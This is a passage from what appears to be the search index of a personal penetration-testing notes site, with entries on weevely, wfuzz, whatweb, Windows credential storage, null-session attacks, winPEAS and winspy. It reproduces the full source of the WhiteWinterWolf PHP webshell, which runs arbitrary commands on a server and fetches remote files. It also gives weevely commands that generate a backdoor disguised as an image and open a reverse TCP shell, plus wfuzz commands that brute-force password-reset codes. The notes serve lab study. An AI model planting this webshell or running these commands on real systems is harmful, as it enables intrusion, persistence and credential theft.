        Download from github repo: https://github.com/mar10/wsgidav.

        sudo pip install wsgidav cheroot\n
        ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#basis-usage","title":"Basis usage","text":"
        sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
        ","tags":["pentesting","windows","server"]},{"location":"weevely/","title":"weevely","text":"

        Weevely is\u00a0a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

        # Generate backdoor agent\nweevely generate <password> <path/to/save/your/phpBackdoorNamefile.php>\n#generate is for generating a backdoor\n# password to access the file\n\n# Then, you upload the file into the victim's server and use weevely to connect\n# Run terminal to the target\n weevely <URL> <password> [cmd]\n\n\n# Load session file\nweevely session <path>\n

        Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

        • Read the\u00a0Install\u00a0page to install weevely and its dependencies.
        • Read the\u00a0Getting Started\u00a0page to generate an agent and connect to it.
        • Browse the\u00a0Wiki\u00a0to read examples and use cases.
        ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#example-from-a-lab","title":"Example from a lab","text":"

        Generate a php webshell with Weevely and saving it an image:

        weevely generate secretpassword example.png \n

        Upload it to the application.

        Make the connection with weevely:

        weevely https://example.com/uploads/example.jpg/example.php secretpassword\n

        ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-commands","title":"weevely commands","text":"
        # Cray for Help\nweevely> help\n

        In an attack you will probably need:

        # Read /etc/passwd with different techniques. Nice touch here is that weevely can bypass some restriction introduced in \"cat /etc/passwd\". For that it uses the attribute -vector\n:audit_etcpasswd            \n# -vector: posix_getpwuid, file, fread, file_get_contents, base64\n\n# Collect system information\n:system_info\n\n# Audit the file system for weak permissions.\n:audit_filesystem\n\n# Execute shell commands, BUT the cool part is that it bypasses the inability to run a bash command by tunnelling into a different language command. To see available languages, use the attribute -h\n:shell_sh -vector <VectorValue> <Command>\n# -vector With attribute vector you can choose to execute bash through php, python...\n\n# Download file from remote filesystem.\n:file_download -vector <VECTORValue> <rpath> <lpath>\n# -vector: file, fread, file_get_contents, base64\n# rpath: remote path of the file you want to download\n# lpath: location where you want to save it\n\n\n# Upload file to remote filesystem.\n:file_upload \n\n# Execute a reverse TCP shell.\n:backdoor_reversetcp -shell <SHELLType> -npo-autonnet -vector <VALUEofVector> <LHOST> <LPORT> \n:backdoor_reversetcp -h\n
        ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-complete-list-of-commands","title":"weevely complete list of commands","text":"Module Description :audit_filesystem Audit the file system for weak permissions. :audit_suidsgid Find files with SUID or SGID flags. :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd Read /etc/passwd with different techniques. :audit_phpconf Audit PHP configuration. :shell_sh Execute shell commands. :shell_su Execute commands with su. :shell_php Execute PHP commands. :system_extensions Collect PHP and webserver extension list. :system_info Collect system information. :system_procs List running processes. :backdoor_reversetcp Execute a reverse TCP shell. :backdoor_tcp Spawn a shell on a TCP port. :bruteforce_sql Bruteforce SQL database. :file_gzip Compress or expand gzip files. :file_clearlog Remove string from a file. :file_check Get attributes and permissions of a file. :file_upload Upload file to remote filesystem. :file_webdownload Download an URL. :file_tar Compress or expand tar archives. :file_download Download file from remote filesystem. :file_bzip2 Compress or expand bzip2 files. :file_edit Edit remote file on a local editor. :file_grep Print lines matching a pattern in multiple files. :file_ls List directory content. :file_cp Copy single file. :file_rm Remove remote file. :file_upload2web Upload file automatically to a web folder and get corres :file_zip Compress or expand zip files. :file_touch Change file timestamp. :file_find Find files with given names and attributes. :file_mount Mount remote filesystem using HTTPfs. :file_enum Check existence and permissions of a list of paths. :file_read Read remote file from the remote filesystem. :file_cd Change current working directory. :sql_console Execute SQL query or run console. :sql_dump Multi dbms mysqldump replacement. :net_mail Send mail. :net_phpproxy Install PHP proxy on the target. :net_curl Perform a curl-like HTTP request. :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the :net_scan TCP Port scan. :net_ifconfig Get network interfaces addresses.","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"wfuzz/","title":"wfuzz","text":"","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#basic-commands","title":"Basic commands","text":"
        wfuzz -d '{\"email\":\"hapihacker@hapihacker.com\",\"password\":\"PASSWORD\"}' -H 'Content-Type: application/json'-z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. You use a -H flag for each header\n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n
        # Fuzzing an old api version which doesn't implement a request limit when resetting password. It allows us to FUZZ the OTP and reset the password for any user.\nwfuzz -d '{\"email\":\"hapihacker@hapihacker.com\", \"otp\":\"FUZZ\" \"password\":\"NewPasswordreseted\"}' -H 'Content-Type: application/json'-z file,/usr/share/wordlists/SecLists-master/Fuzzing/4-digits-0000-9999.txt -u http://localhost:8888/identity/api/auth/v2/check-otp  --hc 500\n

        Subdomain enumeration:

        wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n
        ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#encoding","title":"Encoding","text":"
        # Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hackig-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separated requests.  \nwfuzz -z list,a,base64-md5-none \n# this results in three payloads: one encoded in base64, another in md5 and last with none. \n\n# Each payload will be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hackig-example.com/api/v2/FUZZ\n
        ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#dealing-with-rate-limits-in-apis","title":"Dealing with rate limits (in APIs)","text":"
        -s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n
        ","tags":["pentesting","web pentesting"]},{"location":"whatweb/","title":"whatweb","text":"

        WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#installation","title":"Installation","text":"

        Already installed in Kali.

        Download from: https://github.com/urbanadventurer/WhatWeb

        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#basic-usage","title":"Basic usage","text":"
        # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors 10.10.10.0/24\n\n\nwhatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whitewinterwolf-webshell/","title":"WhiteWinterWolf php webshell","text":"

        Source: https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php.

        It is similar to the Antak Webshell in aspx from the nishang project but with php. It generates a page on the server from which we can indicate the ip and port where we want to receive the output of the commands we introduce,

        <?php\n/*******************************************************************************\n * Copyright 2017 WhiteWinterWolf\n * https://www.whitewinterwolf.com/tags/php-webshell/\n *\n * This file is part of wwolf-php-webshell.\n *\n * wwwolf-php-webshell is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program.  If not, see <http://www.gnu.org/licenses/>.\n ******************************************************************************/\n\n/*\n * Optional password settings.\n * Use the 'passhash.sh' script to generate the hash.\n * NOTE: the prompt value is tied to the hash!\n */\n$passprompt = \"WhiteWinterWolf's PHP webshell: \";\n$passhash = \"\";\n\nfunction e($s) { echo htmlspecialchars($s, ENT_QUOTES); }\n\nfunction h($s)\n{\n    global $passprompt;\n    if (function_exists('hash_hmac'))\n    {\n        return hash_hmac('sha256', $s, $passprompt);\n    }\n    else\n    {\n        return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));\n    }\n}\n\nfunction fetch_fopen($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    if (strpos($host, '://') === false)\n    {\n        $host = 'http://' . $host;\n    }\n    else\n    {\n        $host = str_replace(array('ssl://', 'tls://'), 'https://', $host);\n    }\n    $rh = fopen(\"${host}:${port}${src}\", 'rb');\n    if ($rh !== false)\n    {\n        $wh = fopen($dst, 'wb');\n        if ($wh !== false)\n        {\n            $cbytes = 0;\n            while (! feof($rh))\n            {\n                $cbytes += fwrite($wh, fread($rh, 1024));\n            }\n            fclose($wh);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (${cbytes} bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($rh);\n    }\n    else\n    {\n        $ret = \"${err} Failed to open URL <i>${host}:${port}${src}</i><br />\";\n    }\n    return $ret;\n}\n\nfunction fetch_sock($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    $host = str_replace('https://', 'tls://', $host);\n    $s = fsockopen($host, $port);\n    if ($s)\n    {\n        $f = fopen($dst, 'wb');\n        if ($f)\n        {\n            $buf = '';\n            $r = array($s);\n            $w = NULL;\n            $e = NULL;\n            fwrite($s, \"GET ${src} HTTP/1.0\\r\\n\\r\\n\");\n            while (stream_select($r, $w, $e, 5) && !feof($s))\n            {\n                $buf .= fread($s, 1024);\n            }\n            $buf = substr($buf, strpos($buf, \"\\r\\n\\r\\n\") + 4);\n            fwrite($f, $buf);\n            fclose($f);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (\" . strlen($buf) . \" bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($s);\n    }\n    else\n    {\n        $ret .= \"${err} Failed to connect to <i>${host}:${port}</i><br />\";\n    }\n    return $ret;\n}\n\nini_set('log_errors', '0');\nini_set('display_errors', '1');\nerror_reporting(E_ALL);\n\nwhile (@ ob_end_clean());\n\nif (! isset($_SERVER))\n{\n    global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;\n    $_FILES = &$HTTP_POST_FILES;\n    $_POST = &$HTTP_POST_VARS;\n    $_SERVER = &$HTTP_SERVER_VARS;\n}\n\n$auth = '';\n$cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];\n$cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];\n$fetch_func = 'fetch_fopen';\n$fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];\n$fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];\n$fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];\n$pass = empty($_POST['pass']) ? '' : $_POST['pass'];\n$url = $_SERVER['REQUEST_URI'];\n$status = '';\n$ok = '&#9786; :';\n$warn = '&#9888; :';\n$err = '&#9785; :';\n\nif (! empty($passhash))\n{\n    if (function_exists('hash_hmac') || function_exists('mhash'))\n    {\n        $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];\n        if (h($auth) !== $passhash)\n        {\n            ?>\n                <form method=\"post\" action=\"<?php e($url); ?>\">\n                    <?php e($passprompt); ?>\n                    <input type=\"password\" size=\"15\" name=\"pass\">\n                    <input type=\"submit\" value=\"Send\">\n                </form>\n            <?php\n            exit;\n        }\n    }\n    else\n    {\n        $status .= \"${warn} Authentication disabled ('mhash()' missing).<br />\";\n    }\n}\n\nif (! ini_get('allow_url_fopen'))\n{\n    ini_set('allow_url_fopen', '1');\n    if (! ini_get('allow_url_fopen'))\n    {\n        if (function_exists('stream_select'))\n        {\n            $fetch_func = 'fetch_sock';\n        }\n        else\n        {\n            $fetch_func = '';\n            $status .= \"${warn} File fetching disabled ('allow_url_fopen'\"\n                . \" disabled and 'stream_select()' missing).<br />\";\n        }\n    }\n}\nif (! ini_get('file_uploads'))\n{\n    ini_set('file_uploads', '1');\n    if (! ini_get('file_uploads'))\n    {\n        $status .= \"${warn} File uploads disabled.<br />\";\n    }\n}\nif (ini_get('open_basedir') && ! ini_set('open_basedir', ''))\n{\n    $status .= \"${warn} open_basedir = \" . ini_get('open_basedir') . \"<br />\";\n}\n\nif (! chdir($cwd))\n{\n  $cwd = getcwd();\n}\n\nif (! empty($fetch_func) && ! empty($fetch_path))\n{\n    $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);\n    $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);\n}\n\nif (ini_get('file_uploads') && ! empty($_FILES['upload']))\n{\n    $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);\n    if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))\n    {\n        $status .= \"${ok} Uploaded file <i>${dest}</i> (\" . $_FILES['upload']['size'] . \" bytes)<br />\";\n    }\n}\n?>\n\n<form method=\"post\" action=\"<?php e($url); ?>\"\n    <?php if (ini_get('file_uploads')): ?>\n        enctype=\"multipart/form-data\"\n    <?php endif; ?>\n    >\n    <?php if (! empty($passhash)): ?>\n        <input type=\"hidden\" name=\"auth\" value=\"<?php e($auth); ?>\">\n    <?php endif; ?>\n    <table border=\"0\">\n        <?php if (! empty($fetch_func)): ?>\n            <tr><td>\n                <b>Fetch:</b>\n            </td><td>\n                host: <input type=\"text\" size=\"15\" id=\"fetch_host\" name=\"fetch_host\" value=\"<?php e($fetch_host); ?>\">\n                port: <input type=\"text\" size=\"4\" id=\"fetch_port\" name=\"fetch_port\" value=\"<?php e($fetch_port); ?>\">\n                path: <input type=\"text\" size=\"40\" id=\"fetch_path\" name=\"fetch_path\" value=\"\">\n            </td></tr>\n        <?php endif; ?>\n        <tr><td>\n            <b>CWD:</b>\n        </td><td>\n            <input type=\"text\" size=\"50\" id=\"cwd\" name=\"cwd\" value=\"<?php e($cwd); ?>\">\n            <?php if (ini_get('file_uploads')): ?>\n                <b>Upload:</b> <input type=\"file\" id=\"upload\" name=\"upload\">\n            <?php endif; ?>\n        </td></tr>\n        <tr><td>\n            <b>Cmd:</b>\n        </td><td>\n            <input type=\"text\" size=\"80\" id=\"cmd\" name=\"cmd\" value=\"<?php e($cmd); ?>\">\n        </td></tr>\n        <tr><td>\n        </td><td>\n            <sup><a href=\"#\" onclick=\"cmd.value=''; cmd.focus(); return false;\">Clear cmd</a></sup>\n        </td></tr>\n        <tr><td colspan=\"2\" style=\"text-align: center;\">\n            <input type=\"submit\" value=\"Execute\" style=\"text-align: right;\">\n        </td></tr>\n    </table>\n\n</form>\n<hr />\n\n<?php\nif (! empty($status))\n{\n    echo \"<p>${status}</p>\";\n}\n\necho \"<pre>\";\nif (! empty($cmd))\n{\n    echo \"<b>\";\n    e($cmd);\n    echo \"</b>\\n\";\n    if (DIRECTORY_SEPARATOR == '/')\n    {\n        $p = popen('exec 2>&1; ' . $cmd, 'r');\n    }\n    else\n    {\n        $p = popen('cmd /C \"' . $cmd . '\" 2>&1', 'r');\n    }\n    while (! feof($p))\n    {\n        echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);\n        @ flush();\n    }\n}\necho \"</pre>\";\n\nexit;\n?>\n
        ","tags":["webshell","php"]},{"location":"window-detective/","title":"Window Detective - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"window-detective/#installation","title":"Installation","text":"

        Download it from: \u00a0Window Detective

        ","tags":["pentesting","windows","thick client"]},{"location":"windows-binaries/","title":"Windows binaries - LOLBAS - LOLBAS","text":"

        Equivalent to suid binaries from linux in Windows would be: LOLBAS: https://lolbas-project.github.io/ (Living Off The Land Binaries, Scripts and Libraries),

        ","tags":["pentesting","privilege escalation","windows"]},{"location":"windows-credentials-storage/","title":"Windows credentials storage","text":"

        Microsoft documentation.

        ","tags":["windows"]},{"location":"windows-credentials-storage/#how-login-happens","title":"How login happens","text":"

        The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer.

        Source: HackTheBox Academy. Module Password attacks.

        ","tags":["windows"]},{"location":"windows-credentials-storage/#lsass","title":"LSASS","text":"

        Local Security Authority Subsystem Service (LSASS) is a collection of many modules and has access to all authentication processes that can be found in %SystemRoot%\\System32\\Lsass.exe. This service is responsible for the local system security policy, user authentication, and sending security audit logs to the Event log.

        The LSA has the following components:

        Netlogon.dll . The Net Logon service. Net Logon maintains the computer's secure channel to a domain controller. It passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers and user rights for the user. In Windows\u00a02000, the Net Logon service uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers. Net Logon is the replication protocol for Microsoft\u00ae Windows\u00a0NT\u00ae version\u00a04.0 primary domain controllers and backup domain controllers.

        Msv1_0.dll . The NTLM authentication protocol. This protocol authenticates clients that do not use Kerberos authentication.

        Schannel.dll . The Secure Sockets Layer (SSL) authentication protocol. This protocol provides authentication over an encrypted channel instead of a less-secure clear channel.

        Kerberos.dll . The Kerberos\u00a0v5 authentication protocol.

        Kdcsvc.dll . The Kerberos Key Distribution Center (KDC) service, which is responsible for granting ticket-granting tickets to clients.

        Lsasrv.dll . The LSA server service, which enforces security policies.

        Samsrv.dll . The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies, and supports APIs.

        Ntdsa.dll . The directory service module, which supports the Windows\u00a02000 replication protocol and Lightweight Directory Access Protocol (LDAP), and manages partitions of data.

        Secur32.dll . The multiple authentication provider that holds all of the components together.

        Upon initial logon, LSASS will:

        • Cache credentials locally in memory
        • Create access tokens
        • Enforce security policies
        • Write to Windows security log
        ","tags":["windows"]},{"location":"windows-credentials-storage/#gina","title":"GINA","text":"

        Each interactive logon session creates a separate instance of the Winlogon service. The Graphical Identification and Authentication (GINA) architecture is loaded into the process area used by Winlogon, receives and processes the credentials, and invokes the authentication interfaces via the LSALogonUser function.

        ","tags":["windows"]},{"location":"windows-credentials-storage/#sam-database","title":"SAM Database","text":"

        The Security Account Manager (SAM) is a database file in Windows operating systems that stores users' passwords. It can be used to authenticate local and remote users. User passwords are stored in a hash format in a registry structure as either an LM hash or an NTLM hash. This file is located in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.

        SYSTEM level permissions are required to view it.

        Windows systems can be assigned to either a workgroup or domain during setup. If the system has been assigned to a workgroup, it handles the SAM database locally and stores all existing users locally in this database. However, if the system has been joined to a domain, the Domain Controller (DC) must validate the credentials from the Active Directory database (ntds.dit), which is stored in %SystemRoot%\\ntds.dit.

        Microsoft introduced a security feature in Windows NT 4.0 to help improve the security of the SAM database against offline software cracking. This is the SYSKEY (syskey.exe) feature, which, when enabled, partially encrypts the hard disk copy of the SAM file so that the password hash values for all local accounts stored in the SAM are encrypted with a key.

        Credential Manager is a feature built-in to all Windows operating systems that allows users to save the credentials they use to access various network resources and websites. Saved credentials are stored based on user profiles in each user's Credential Locker. Credentials are encrypted and stored at the following location:

        PS C:\\Users\\[Username]\\AppData\\Local\\Microsoft\\[Vault/Credentials]\\\n
        ","tags":["windows"]},{"location":"windows-credentials-storage/#domain-controllers","title":"Domain Controllers","text":"

        Each Domain Controller hosts a file called NTDS.dit that is kept synchronized across all Domain Controllers with the exception of Read-Only Domain Controllers. NTDS.dit is a database file that stores the data in Active Directory, including but not limited to:

        • User accounts (username & password hash)
        • Group accounts
        • Computer accounts
        • Group policy objects
        ","tags":["windows"]},{"location":"windows-credentials-storage/#tools-for-dumping-credentials","title":"Tools for dumping credentials","text":"
        • CrackMapExec.
        • John The Ripper.
        • Hydra.
        • Metasploit.
        • Mimikatz.
        • pypykatz.
        • Lazagne.
        ","tags":["windows"]},{"location":"windows-credentials-storage/#findstr","title":"findstr","text":"

        We can also use findstr to search from patterns across many types of files.

        C:\\> findstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
        ","tags":["windows"]},{"location":"windows-null-session-attack/","title":"Windows Null session attack","text":"

        It\u2019s used to enumerate info (password, system users, system groups. running system processes). A null session attack exploits an authentification vulnerability for Windows Administrative Shares. This lets an attacker connect to a local or remote share without authentification.

        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-windows","title":"Manually from Windows","text":"
        1. Enumerate File Server services:
        nbtstat -A $ip \u00a0\n\n# ELS-WINXP \u00a0 <00> \u00a0 UNIQUE \u00a0 Registered\n# <00> tells us ELS-WINXP is a workstation.\n# <20> says that the file sharing service is up and running on the machine\n# UNIQUE tells us that this compiter must have only one IP address assigned\n
        1. Enumerate Windows Shares. Once we spot a machine with the File Server service running, we can enumerate:
        NET VIEW $ip\n
        1. Verify if a null attack is possible by exploiting the IPC$ administrative share and trying to connect without valid credentials.
        NET USE \\\\$ip\\IPC$ \u2018\u2019 /u:\u2019\u2019\n

        This tells Windows to connect to the IPC$ share by using an empty password and a empty username. It only works with IPC$ (not c$).

        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#manually-from-linux","title":"Manually from Linux","text":"

        Using the samba suite: https://www.samba.org/

        1. Enumerate File Server services:
        nmblookup -A $ip\n
        1. Also with the smbclient we can enumerate the shares provides by a host:
        smbclient -L //$ip -N\n\n# -L\u00a0 Look at what services are available on a target\n# $ip\u00a0Prepend the two slahes\n# -N \u00a0Force the tool not to ask for a password\n
        1. Connect:
        smbclient \\\\$ip\\sharedfolder -N\n

        Be careful, sometimes the shell removes the slashes and you need to escape them.

        1. Once connected you can browse with the smb command line. To see allowed commands: help
        2. When you know the path of a file and you want to retrieve it:

          • from kali:
            smbget smb://$ip/SharedFolder/flag_1.txt\n
          • from smb command line:
            get flag_1.txt\n
        3. To map users with permissions

        smbmap -H demo.ine.local\n

        To get an specific file in a connection: get flag.txt

        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#tricks","title":"Tricks","text":"

        Enumerate users with enum4linux -U demo.ine.local

        Enumerate the permissions of users with smbmap -H demo.ine.local

        If some users are missing in the permission list, maybe they are accesible, try with:

        smbclient -L //$ip\\<user> -N\n
        ","tags":["pentesting windows"]},{"location":"windows-null-session-attack/#more-tools","title":"More tools","text":"
        • Winfo.
        • enum.
        • enum4linux.
        • SAMRDump.
        ","tags":["pentesting windows"]},{"location":"windows-privilege-escalation-history/","title":"Windows: Privilege Escalation - Recently accessed files and executed commands","text":"

        Check recently accessed files/executed commands. Mostly (default) our console history will be saved in

        C:\\Users\\<account_name>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt . \n
        ","tags":["windows","privilege escalation"]},{"location":"winfo/","title":"Winfo","text":"

        Winfo uses Null Session attacks to retrieve account and share information from Windows NT.

        ","tags":["pentesting windows"]},{"location":"winfo/#installation","title":"Installation","text":"

        Download it from: https://packetstormsecurity.com/search/?q=winfo&s=files.

        ","tags":["pentesting windows"]},{"location":"winfo/#basic-command","title":"Basic command","text":"
        winfo.exe $ip -n\n
        ","tags":["pentesting windows"]},{"location":"winpeas/","title":"Windows Privilege Escalation Awesome Scripts: winPEAS","text":"

        And that is exactly what winPEAS stands for: windows Privilege Escalation Awesome Scripts.

        Download it from https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS.

        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#what-it-does","title":"What it does","text":"
        • Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz that I'm copypasting below.
        • Provide information about how to exploit misconfigurations.

        In the github repo, you will see two files: a .bat and an .exe version.

        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#checklist-for-local-windows-privilege-escalation","title":"Checklist for Local windows Privilege Escalation","text":"

        Source: winPEAS README.md file.

        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#system-info","title":"System Info","text":"
        • Obtain System information
        • Search for kernel exploits using scripts.
        • Use Google to search for kernel exploits
        • Use searchsploit to search for kernel exploits
        • Interesting info in env vars?
        • Passwords in PowerShell history?
        • Interesting info in Internet settings?
        • Drives
        • WSUS exploit?
        • AlwaysInstallElevated?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#loggingav-enumeration","title":"Logging/AV enumeration","text":"
        • Check Audit and WEF
        • Check LAPS
        • Check if WDigest is active
        • LSA Protection?
        • Credentials Guard
        • Cached Credentials?
        • Check if any AV
        • AppLocker Policy?
        • UAC
        • User Privileges
        • Check current user privilege
        • Are you member of any privileged group
        • Check if you have any of these tokens enabled: SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege?
        • Users Sessions?
        • Check users homes (access?)
        • Check Password Policy
        • What is inside the Clipboard?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network","title":"Network","text":"
        • Check current network informatio
        • Check hidden local services restricted to the outside
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#running-processes","title":"Running Processes","text":"
        • Processes binaries file and folders permission
        • Memory Password mining
        • Insecure GUI apps
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#services","title":"Services","text":"
        • Can you modify any service
        • Can you modify the binary that is executed by any service
        • Can you modify the registry of any service
        • Can you take advantage of any unquoted service binary path
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#applications","title":"Applications","text":"
        • Write permissions on installed applications
        • Startup Applications
        • Vulnerable Drivers
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#dll-hijacking","title":"DLL Hijacking","text":"
        • Can you write in any folder inside PATH?
        • Is there any known service binary that tries to load any non-existant DLL?
        • Can you write in any binaries folder?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network_1","title":"Network","text":"
        • Enumerate the network (shares, interfaces, routes, neighbours, ...)
        • Take a special look at network services listening on localhost (127.0.0.1)
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#windows-credentials","title":"Windows Credentials","text":"
        • Winlogon.
        • Windows Vault.
        • Interesting DPAPI credentials.
        • Passwords of saved Wifi networks.
        • Interesting info in saved RDP Connections.
        • Passwords in recently run commands.
        • Remote Desktop Credentials Manager.
        • AppCmd.exe exists.
        • SCClient.exe.
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#files-and-registry-credentials","title":"Files and Registry (Credentials)","text":"
        • Putty: Creds.
        • SSH keys in registry.
        • Passwords in unattended files.
        • Any SAM & SYSTEM.
        • Cloud credentials.
        • McAfee SiteList.xml.
        • Cached GPP Password?
        • Password in IIS Web config file.
        • Interesting info in web logs.
        • Do you want to ask for credentials
        • Interesting files inside the Recycle Bin.
        • Other registry containing credentials.
        • Inside Browser data.
        • Generic password search.
        • Tools.
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#leaked-handlers","title":"Leaked Handlers","text":"
        • Have you access to any handler of a process run by administrator?
        ","tags":["windows","privilege escalation"]},{"location":"winpeas/#pipe-client-impersonation","title":"Pipe Client Impersonation","text":"","tags":["windows","privilege escalation"]},{"location":"winspy/","title":"winspy - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"winspy/#installation","title":"Installation","text":"

        Download it from https://www.catch22.net/software/winspy

        ","tags":["pentesting","windows","thick client"]},{"location":"winspy/#what-it-does","title":"What it does","text":"

        Basically winspy allows us to \u00a0select and view the properties of any window in the system. WinSpy is based around the Spy++ utility that ships with Microsoft Visual Studio.

        It allows us to retrieve passwords from password-edit controls.

        Here an example:

        ![[Pasted image 20230201192438.png]]

        Another nice example:

        ![[Pasted image 20230201192528.png]]

        Here a list of all windows properties that it retrieves:

        • Window Class and Name.
        • Window procedure address.
        • All window styles and extended styles.
        • Window properties (set using the SetProp API call).
        • Complete Child and Sibling window relationships.
        • Scrollbar positional information.
        • Full window Class information.
        • Retrieve passwords from password-edit controls!
        • Edit window styles!
        • Alter window captions!
        • Show / Hide / Enable / Disable / Adjust any window in the system!
        • Massively improved user-interface!
        • View the complete system window hierarchy!
        • Multi-monitor support!
        • Now works correctly for all versions of Windows.
        • Tree hierarchy now groups by process.
        ","tags":["pentesting","windows","thick client"]},{"location":"wireless-security/","title":"Wireless security","text":""},{"location":"wireless-security/#basic-concepts","title":"Basic concepts","text":"Name Explanation MAC address A unique identifier for the device's wireless adapter. SSID The network name, also known as the Service Set Identifier of the WiFi network. Supported data rates A list of the data rates the device can communicate. Supported channels A list of the channels (frequencies) on which the device can communicate. Supported security protocols A list of the security protocols that the device is capable of using, such as WPA2/WPA3.

        Wired Equivalent Privacy: WEP

        Wi-Fi Protected Access: WPA

